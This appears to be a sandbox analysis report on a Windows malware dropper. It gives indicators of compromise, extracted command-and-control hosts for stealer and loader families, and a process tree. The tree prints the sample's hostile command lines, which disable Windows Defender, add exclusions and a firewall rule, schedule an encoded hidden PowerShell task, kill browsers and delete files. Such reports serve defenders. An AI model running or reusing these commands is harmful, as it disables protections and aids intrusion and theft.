Analysis
max time kernel: 151s
max time network: 151s
platform: windows10_x64
resource: win10-en-20211208
submitted: 26/12/2021, 06:26

Static task: static1
Behavioral task: behavioral1
Sample: a15fcb15ff8d0824099fe99986c3425f.exe
Resource: win7-en-20211208
General
Target: a15fcb15ff8d0824099fe99986c3425f.exe
Size: 6.3MB
MD5: a15fcb15ff8d0824099fe99986c3425f
SHA1: b041d309bcb43b100d7f93a99ad43e8725413ceb
SHA256: a8608c25f43dcab1c8501cb89b796d75b94a0abd260d3cee39a7e56e889326d6
SHA512: 1ed23bdf6a454d8dc36abdbdc76eff61c79e0b25970cf98cea71e4873bb417594870ff5500cb0595abb6c3dbb9b451ad92e6e05ba1eedbe9f03f5edf36f73f45
Malware Config

Extracted
  Family: socelars
  C2: http://www.biohazardgraphics.com/

Extracted
  Family: vidar
  Version: 49.2
  Botnet: 915
  C2:
    https://mstdn.social/@kipriauk9
    https://qoto.org/@kipriauk8
  profile_id: 915

Extracted
  Family: redline
  Botnet: media22ns
  C2: 65.108.69.168:13293

Extracted
  Family: redline
  Botnet: userv1
  C2: 159.69.246.184:13127

Extracted
  Family: smokeloader
  Version: 2020
  C2:
    http://rcacademy.at/upload/
    http://e-lanpengeonline.com/upload/
    http://vjcmvz.cn/upload/
    http://galala.ru/upload/
    http://witra.ru/upload/
Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
  description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  pid: 4228  pid_target: 3232  Process: rundll32.exe  procid_target: 127
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload 8 IoCs
  resource  yara_rule
  behavioral2/memory/3316-296-0x0000000000400000-0x0000000000420000-memory.dmp  family_redline
  behavioral2/memory/3316-302-0x0000000000400000-0x0000000000420000-memory.dmp  family_redline
  behavioral2/memory/2184-305-0x0000000000400000-0x0000000000420000-memory.dmp  family_redline
  behavioral2/memory/3316-303-0x0000000000400000-0x0000000000420000-memory.dmp  family_redline
  behavioral2/memory/2184-306-0x0000000000400000-0x0000000000420000-memory.dmp  family_redline
  behavioral2/memory/2184-298-0x000000000041932A-mapping.dmp  family_redline
  behavioral2/memory/3316-297-0x0000000000419336-mapping.dmp  family_redline
  behavioral2/memory/2184-295-0x0000000000400000-0x0000000000420000-memory.dmp  family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload 2 IoCs
  resource  yara_rule
  behavioral2/files/0x000500000001ab71-155.dat  family_socelars
  behavioral2/files/0x000500000001ab71-174.dat  family_socelars
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
  resource  yara_rule
  behavioral2/files/0x000500000001ab7d-188.dat  WebBrowserPassView
  behavioral2/files/0x000500000001ab7d-226.dat  WebBrowserPassView

Nirsoft 5 IoCs
  resource  yara_rule
  behavioral2/files/0x000500000001ab7d-188.dat  Nirsoft
  behavioral2/files/0x000500000001ab7d-226.dat  Nirsoft
  behavioral2/memory/2004-321-0x0000000000400000-0x0000000000455000-memory.dmp  Nirsoft
  behavioral2/files/0x000500000001ab8d-320.dat  Nirsoft
  behavioral2/files/0x000500000001ab8d-319.dat  Nirsoft

Vidar Stealer 2 IoCs
  resource  yara_rule
  behavioral2/memory/748-273-0x0000000000400000-0x00000000008B0000-memory.dmp  family_vidar
  behavioral2/memory/748-271-0x0000000000DD0000-0x0000000000EA5000-memory.dmp  family_vidar

  resource  yara_rule
  behavioral2/files/0x000600000001ab65-120.dat  aspack_v212_v242
  behavioral2/files/0x000600000001ab65-122.dat  aspack_v212_v242
  behavioral2/files/0x000700000001ab66-119.dat  aspack_v212_v242
  behavioral2/files/0x000700000001ab66-124.dat  aspack_v212_v242
  behavioral2/files/0x000600000001ab6b-125.dat  aspack_v212_v242
  behavioral2/files/0x000600000001ab6b-126.dat  aspack_v212_v242
Downloads MZ/PE file

Executes dropped EXE 19 IoCs
  pid   Process
  3700  setup_install.exe
  2928  Thu1185ccb71be14d.exe
  2000  Thu11d4773c01d6f0.exe
  2752  Thu1185475076e48cb16.exe
  1576  Thu111723557c117162.exe
  2464  Thu11e9a815c8cbb1a.exe
  748   Thu115efe21f1a89d5.exe
  2364  Thu11905232b5734.exe
  2028  Thu1179364c94e82.exe
  844   Thu11cf387a29397511.exe
  3096  Thu11307f0493.exe
  3032  Thu11a637868f8aa.exe
  2988  Thu110155a356f.exe
  1424  Thu11f7717aa35a4ea.exe
  1588  Thu11f106a00ed17759.exe
  2876  Thu11f281fb2df.exe
  3784  Thu11cf387a29397511.exe
  436   Thu11307f0493.tmp
  1616  Thu11a637868f8aa.exe
Modifies Windows Firewall 1 TTPs

Loads dropped DLL 8 IoCs
  pid   Process
  3700  setup_install.exe
  3700  setup_install.exe
  3700  setup_install.exe
  3700  setup_install.exe
  3700  setup_install.exe
  3700  setup_install.exe
  3700  setup_install.exe
  436   Thu11307f0493.tmp

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  40    ip-api.com
  57    ipinfo.io
  58    ipinfo.io
  218   ipinfo.io
  219   ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of SetThreadContext 1 IoCs
  description: PID 844 set thread context of 3784
  pid: 844  Process: Thu11cf387a29397511.exe  procid_target: 102

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash 4 IoCs
  pid   pid_target  Process       procid_target
  2460  2364        WerFault.exe  88
  4084  2028        WerFault.exe  95
  4952  4300        WerFault.exe  155
  5588  4900        WerFault.exe  138

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   Process
  5312  schtasks.exe

Delays execution with timeout.exe 1 IoCs
  pid   Process
  4288  timeout.exe

Kills process with taskkill 3 IoCs
  pid   Process
  2452  taskkill.exe
  860   taskkill.exe
  4992  taskkill.exe
Suspicious use of AdjustPrivilegeToken 39 IoCs
  description                              pid   Process
  Token: SeCreateTokenPrivilege            1576  Thu111723557c117162.exe
  Token: SeAssignPrimaryTokenPrivilege     1576  Thu111723557c117162.exe
  Token: SeLockMemoryPrivilege             1576  Thu111723557c117162.exe
  Token: SeIncreaseQuotaPrivilege          1576  Thu111723557c117162.exe
  Token: SeMachineAccountPrivilege         1576  Thu111723557c117162.exe
  Token: SeTcbPrivilege                    1576  Thu111723557c117162.exe
  Token: SeSecurityPrivilege               1576  Thu111723557c117162.exe
  Token: SeTakeOwnershipPrivilege          1576  Thu111723557c117162.exe
  Token: SeLoadDriverPrivilege             1576  Thu111723557c117162.exe
  Token: SeSystemProfilePrivilege          1576  Thu111723557c117162.exe
  Token: SeSystemtimePrivilege             1576  Thu111723557c117162.exe
  Token: SeProfSingleProcessPrivilege      1576  Thu111723557c117162.exe
  Token: SeIncBasePriorityPrivilege        1576  Thu111723557c117162.exe
  Token: SeCreatePagefilePrivilege         1576  Thu111723557c117162.exe
  Token: SeCreatePermanentPrivilege        1576  Thu111723557c117162.exe
  Token: SeBackupPrivilege                 1576  Thu111723557c117162.exe
  Token: SeRestorePrivilege                1576  Thu111723557c117162.exe
  Token: SeShutdownPrivilege               1576  Thu111723557c117162.exe
  Token: SeDebugPrivilege                  1576  Thu111723557c117162.exe
  Token: SeAuditPrivilege                  1576  Thu111723557c117162.exe
  Token: SeSystemEnvironmentPrivilege      1576  Thu111723557c117162.exe
  Token: SeChangeNotifyPrivilege           1576  Thu111723557c117162.exe
  Token: SeRemoteShutdownPrivilege         1576  Thu111723557c117162.exe
  Token: SeUndockPrivilege                 1576  Thu111723557c117162.exe
  Token: SeSyncAgentPrivilege              1576  Thu111723557c117162.exe
  Token: SeEnableDelegationPrivilege       1576  Thu111723557c117162.exe
  Token: SeManageVolumePrivilege           1576  Thu111723557c117162.exe
  Token: SeImpersonatePrivilege            1576  Thu111723557c117162.exe
  Token: SeCreateGlobalPrivilege           1576  Thu111723557c117162.exe
  Token: 31                                1576  Thu111723557c117162.exe
  Token: 32                                1576  Thu111723557c117162.exe
  Token: 33                                1576  Thu111723557c117162.exe
  Token: 34                                1576  Thu111723557c117162.exe
  Token: 35                                1576  Thu111723557c117162.exe
  Token: SeDebugPrivilege                  2028  Thu1179364c94e82.exe
  Token: SeDebugPrivilege                  2000  Thu11d4773c01d6f0.exe
  Token: SeDebugPrivilege                  2364  Thu11905232b5734.exe
  Token: SeDebugPrivilege                  1588  Thu11f106a00ed17759.exe
  Token: SeDebugPrivilege                  1684  powershell.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes

C:\Users\Admin\AppData\Local\Temp\a15fcb15ff8d0824099fe99986c3425f.exe (PID 692)
  cmd: "C:\Users\Admin\AppData\Local\Temp\a15fcb15ff8d0824099fe99986c3425f.exe"
  - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\setup_install.exe (PID 3700)
      cmd: "C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\setup_install.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\cmd.exe (PID 4076)
          cmd: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1544)
              cmd: powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        C:\Windows\SysWOW64\cmd.exe (PID 3064)
          cmd: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1684)
              cmd: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              - Suspicious use of AdjustPrivilegeToken
        C:\Windows\SysWOW64\cmd.exe (PID 4036)
          cmd: C:\Windows\system32\cmd.exe /c Thu1185475076e48cb16.exe
          - Suspicious use of WriteProcessMemory
            C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu1185475076e48cb16.exe (PID 2752)
              cmd: Thu1185475076e48cb16.exe
              - Executes dropped EXE
                C:\Windows\SysWOW64\msiexec.exe (PID 1776)
                  cmd: "C:\Windows\System32\msiexec.exe" /y .\62XW.NZd
        C:\Windows\SysWOW64\cmd.exe (PID 1232)
          cmd: C:\Windows\system32\cmd.exe /c Thu1185ccb71be14d.exe
          - Suspicious use of WriteProcessMemory
            C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu1185ccb71be14d.exe (PID 2928)
              cmd: Thu1185ccb71be14d.exe
              - Executes dropped EXE
                C:\Users\Admin\Pictures\Adobe Films\6hDQ1EUCRuWWKCAjIejhNu55.exe (PID 1096)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\6hDQ1EUCRuWWKCAjIejhNu55.exe"
                C:\Users\Admin\Pictures\Adobe Films\96j26SOGCNn6KY4MZv1Zap95.exe (PID 4744)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\96j26SOGCNn6KY4MZv1Zap95.exe"
                C:\Users\Admin\Pictures\Adobe Films\NkQt1u52SON2sRd7sBPWwM8K.exe (PID 4736)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\NkQt1u52SON2sRd7sBPWwM8K.exe"
                C:\Users\Admin\Pictures\Adobe Films\4tIsmTSkabDEkid3tH6S_vDR.exe (PID 4936)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\4tIsmTSkabDEkid3tH6S_vDR.exe"
                C:\Users\Admin\Pictures\Adobe Films\yVKGPCHydmvpEINyrMGMJkiv.exe (PID 4928)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\yVKGPCHydmvpEINyrMGMJkiv.exe"
                C:\Users\Admin\Pictures\Adobe Films\1yNIW0dtPVuWrpldrv5mBJCs.exe (PID 4900)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\1yNIW0dtPVuWrpldrv5mBJCs.exe"
                    C:\Windows\SysWOW64\WerFault.exe (PID 5588)
                      cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 664
                      - Program crash
                C:\Users\Admin\Pictures\Adobe Films\A969a00lCtVaEQ0DrCLBIoG5.exe (PID 4856)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\A969a00lCtVaEQ0DrCLBIoG5.exe"
                C:\Users\Admin\Pictures\Adobe Films\pzc4zCE6_9e56a7r5EDRe4eQ.exe (PID 5100)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\pzc4zCE6_9e56a7r5EDRe4eQ.exe"
                C:\Users\Admin\Pictures\Adobe Films\E59243SIkeZdlAyNruJMXyFr.exe (PID 5092)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\E59243SIkeZdlAyNruJMXyFr.exe"
                C:\Users\Admin\Pictures\Adobe Films\iTgyhkvRJ2YBK_tPwyQGdOqH.exe (PID 5076)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\iTgyhkvRJ2YBK_tPwyQGdOqH.exe"
                C:\Users\Admin\Pictures\Adobe Films\EGFT0UJCC27T6IW2USgi7RN_.exe (PID 5084)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\EGFT0UJCC27T6IW2USgi7RN_.exe"
                C:\Users\Admin\Pictures\Adobe Films\L0TY8FuHXOhTtbVE97lxpjYs.exe (PID 5068)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\L0TY8FuHXOhTtbVE97lxpjYs.exe"
                C:\Users\Admin\Pictures\Adobe Films\ZMQsB8eiWCv1vizC5Xj0Cf1J.exe (PID 5060)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\ZMQsB8eiWCv1vizC5Xj0Cf1J.exe"
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5756)
                      cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                    C:\Windows\System32\netsh.exe (PID 5808)
                      cmd: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                    C:\Windows\System\svchost.exe (PID 5984)
                      cmd: "C:\Windows\System\svchost.exe" formal
                C:\Users\Admin\Pictures\Adobe Films\RpE1w1iaEhX9cwnH60cQVw6C.exe (PID 5052)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\RpE1w1iaEhX9cwnH60cQVw6C.exe"
                    C:\Users\Public\Videos\hgfdfds.exe (PID 4816)
                      cmd: "C:\Users\Public\Videos\hgfdfds.exe"
                C:\Users\Admin\Pictures\Adobe Films\Cnl6g4rFOGqnVOWMtTwBvjE7.exe (PID 5040)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\Cnl6g4rFOGqnVOWMtTwBvjE7.exe"
                    C:\Users\Admin\AppData\Local\Temp\7zSC616.tmp\Install.exe (PID 1124)
                      cmd: .\Install.exe
                        C:\Users\Admin\AppData\Local\Temp\7zSE0F1.tmp\Install.exe (PID 1484)
                          cmd: .\Install.exe /S /site_id "525403"
                            C:\Windows\SysWOW64\cmd.exe (PID 4212)
                              cmd: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                                C:\Windows\SysWOW64\forfiles.exe (PID 5128)
                                  cmd: forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                                    C:\Windows\SysWOW64\cmd.exe (PID 5364)
                                      cmd: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 5320)
                                          cmd: powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                            C:\Windows\SysWOW64\forfiles.exe (PID 3148)
                              cmd: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                C:\Windows\SysWOW64\cmd.exe (PID 5280)
                                  cmd: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                            C:\Windows\SysWOW64\forfiles.exe (PID 4328)
                              cmd: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                C:\Windows\SysWOW64\cmd.exe (PID 5196)
                                  cmd: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                    \??\c:\windows\SysWOW64\reg.exe (PID 5232)
                                      cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                    \??\c:\windows\SysWOW64\reg.exe (PID 5384)
                                      cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                            C:\Windows\SysWOW64\schtasks.exe (PID 5312)
                              cmd: schtasks /CREATE /TN "gTiNRuWZc" /SC once /ST 01:38:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                              - Creates scheduled task(s)
                            C:\Windows\SysWOW64\schtasks.exe (PID 5704)
                              cmd: schtasks /run /I /tn "gTiNRuWZc"
                C:\Users\Admin\Pictures\Adobe Films\CNr7GyOVjJr68ZTtBBDk9pT3.exe (PID 5032)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\CNr7GyOVjJr68ZTtBBDk9pT3.exe"
                    C:\Users\Admin\AppData\Local\5f888d8c-2f24-4839-978c-e60807f562ac.exe (PID 5916)
                      cmd: "C:\Users\Admin\AppData\Local\5f888d8c-2f24-4839-978c-e60807f562ac.exe"
                    C:\Users\Admin\AppData\Local\ee4171c1-5881-4783-a137-c260bc86d283.exe (PID 5168)
                      cmd: "C:\Users\Admin\AppData\Local\ee4171c1-5881-4783-a137-c260bc86d283.exe"
                C:\Users\Admin\Pictures\Adobe Films\wcuhKSlWqslgz2Qet0QPZdLP.exe (PID 5020)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\wcuhKSlWqslgz2Qet0QPZdLP.exe"
                C:\Users\Admin\Pictures\Adobe Films\A7zdVo9BXyNxcbokck4RzWQm.exe (PID 5008)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\A7zdVo9BXyNxcbokck4RzWQm.exe"
                C:\Users\Admin\Pictures\Adobe Films\q4DP5Ihs3WhuG0gB0NQLmteq.exe (PID 4328)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\q4DP5Ihs3WhuG0gB0NQLmteq.exe"
                C:\Users\Admin\Pictures\Adobe Films\xLe6HmffavM2hZt9HI2MyORU.exe (PID 680)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\xLe6HmffavM2hZt9HI2MyORU.exe"
                C:\Users\Admin\Pictures\Adobe Films\FZ_a8mndiYdjZXgMhtwrOxFe.exe (PID 4300)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\FZ_a8mndiYdjZXgMhtwrOxFe.exe"
                    C:\Windows\SysWOW64\WerFault.exe (PID 4952)
                      cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 400
                      - Program crash
                C:\Users\Admin\Pictures\Adobe Films\CzZCONUxiAStJ59T7qxfj0eZ.exe (PID 1036)
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\CzZCONUxiAStJ59T7qxfj0eZ.exe"
        C:\Windows\SysWOW64\cmd.exe (PID 3232)
          cmd: C:\Windows\system32\cmd.exe /c Thu11d4773c01d6f0.exe
          - Suspicious use of WriteProcessMemory
            C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11d4773c01d6f0.exe (PID 2000)
              cmd: Thu11d4773c01d6f0.exe
              - Executes dropped EXE
              - Suspicious use of AdjustPrivilegeToken
                C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11d4773c01d6f0.exe (PID 2184)
                  cmd: C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11d4773c01d6f0.exe
        C:\Windows\SysWOW64\cmd.exe (PID 1368)
          cmd: C:\Windows\system32\cmd.exe /c Thu11905232b5734.exe
            C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11905232b5734.exe (PID 2364)
              cmd: Thu11905232b5734.exe
              - Executes dropped EXE
              - Suspicious use of AdjustPrivilegeToken
                C:\Windows\system32\WerFault.exe (PID 2460)
                  cmd: C:\Windows\system32\WerFault.exe -u -p 2364 -s 1976
                  - Program crash
        C:\Windows\SysWOW64\cmd.exe (PID 3436)
          cmd: C:\Windows\system32\cmd.exe /c Thu111723557c117162.exe
          - Suspicious use of WriteProcessMemory
            C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu111723557c117162.exe (PID 1576)
              cmd: Thu111723557c117162.exe
              - Executes dropped EXE
              - Suspicious use of AdjustPrivilegeToken
                C:\Windows\SysWOW64\cmd.exe (PID 3676)
                  cmd: cmd.exe /c taskkill /f /im chrome.exe
                    C:\Windows\SysWOW64\taskkill.exe (PID 860)
                      cmd: taskkill /f /im chrome.exe
                      - Kills process with taskkill
        C:\Windows\SysWOW64\cmd.exe (PID 4012)
          cmd: C:\Windows\system32\cmd.exe /c Thu11e9a815c8cbb1a.exe
          - Suspicious use of WriteProcessMemory
            C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11e9a815c8cbb1a.exe (PID 2464)
              cmd: Thu11e9a815c8cbb1a.exe
              - Executes dropped EXE
        C:\Windows\SysWOW64\cmd.exe (PID 404)
          cmd: C:\Windows\system32\cmd.exe /c Thu115efe21f1a89d5.exe
          - Suspicious use of WriteProcessMemory
            C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu115efe21f1a89d5.exe (PID 748)
              cmd: Thu115efe21f1a89d5.exe
              - Executes dropped EXE
                C:\Windows\SysWOW64\cmd.exe (PID 4380)
                  cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im Thu115efe21f1a89d5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu115efe21f1a89d5.exe" & del C:\ProgramData\*.dll & exit
                    C:\Windows\SysWOW64\taskkill.exe (PID 4992)
                      cmd: taskkill /im Thu115efe21f1a89d5.exe /f
                      - Kills process with taskkill
                    C:\Windows\SysWOW64\timeout.exe (PID 4288)
                      cmd: timeout /t 6
                      - Delays execution with timeout.exe
        C:\Windows\SysWOW64\cmd.exe (PID 2920)
          cmd: C:\Windows\system32\cmd.exe /c Thu110155a356f.exe
            C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu110155a356f.exe (PID 2988)
              cmd: Thu110155a356f.exe
              - Executes dropped EXE
                C:\Windows\SysWOW64\msiexec.exe (PID 2300)
                  cmd: "C:\Windows\System32\msiexec.exe" /y .\62XW.NZd
        C:\Windows\SysWOW64\cmd.exe (PID 2132)
          cmd: C:\Windows\system32\cmd.exe /c Thu1179364c94e82.exe
            C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu1179364c94e82.exe (PID 2028)
              cmd: Thu1179364c94e82.exe
              - Executes dropped EXE
              - Suspicious use of AdjustPrivilegeToken
                C:\Windows\system32\WerFault.exe (PID 4084)
                  cmd: C:\Windows\system32\WerFault.exe -u -p 2028 -s 1216
                  - Program crash
        C:\Windows\SysWOW64\cmd.exe (PID 3768)
          cmd: C:\Windows\system32\cmd.exe /c Thu11a637868f8aa.exe
            C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11a637868f8aa.exe (PID 3032)
              cmd: Thu11a637868f8aa.exe
              - Executes dropped EXE
                C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11a637868f8aa.exe (PID 1616)
                  cmd: "C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11a637868f8aa.exe" -u
                  - Executes dropped EXE
        C:\Windows\SysWOW64\cmd.exe (PID 1000)
          cmd: C:\Windows\system32\cmd.exe /c Thu11f7717aa35a4ea.exe
            C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11f7717aa35a4ea.exe (PID 1424)
              cmd: Thu11f7717aa35a4ea.exe
              - Executes dropped EXE
        C:\Windows\SysWOW64\cmd.exe (PID 1836)
          cmd: C:\Windows\system32\cmd.exe /c Thu11307f0493.exe
            C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11307f0493.exe (PID 3096)
              cmd: Thu11307f0493.exe
              - Executes dropped EXE
                C:\Users\Admin\AppData\Local\Temp\is-HDS5J.tmp\Thu11307f0493.tmp (PID 436)
                  cmd: "C:\Users\Admin\AppData\Local\Temp\is-HDS5J.tmp\Thu11307f0493.tmp" /SL5="$101FC,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11307f0493.exe"
                  - Executes dropped EXE
                  - Loads dropped DLL
                    C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11307f0493.exe (PID 1064)
                      cmd: "C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11307f0493.exe" /SILENT
                        C:\Users\Admin\AppData\Local\Temp\is-LQTF9.tmp\Thu11307f0493.tmp (PID 1976)
                          cmd: "C:\Users\Admin\AppData\Local\Temp\is-LQTF9.tmp\Thu11307f0493.tmp" /SL5="$20216,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11307f0493.exe" /SILENT
                            C:\Users\Admin\AppData\Local\Temp\is-QK4FN.tmp\windllhost.exe (PID 2168)
                              cmd: "C:\Users\Admin\AppData\Local\Temp\is-QK4FN.tmp\windllhost.exe" 77
        C:\Windows\SysWOW64\cmd.exe (PID 1476)
          cmd: C:\Windows\system32\cmd.exe /c Thu11f281fb2df.exe
            C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11f281fb2df.exe (PID 2876)
              cmd: Thu11f281fb2df.exe
              - Executes dropped EXE
                C:\Users\Admin\AppData\Local\Temp\11111.exe (PID 2004)
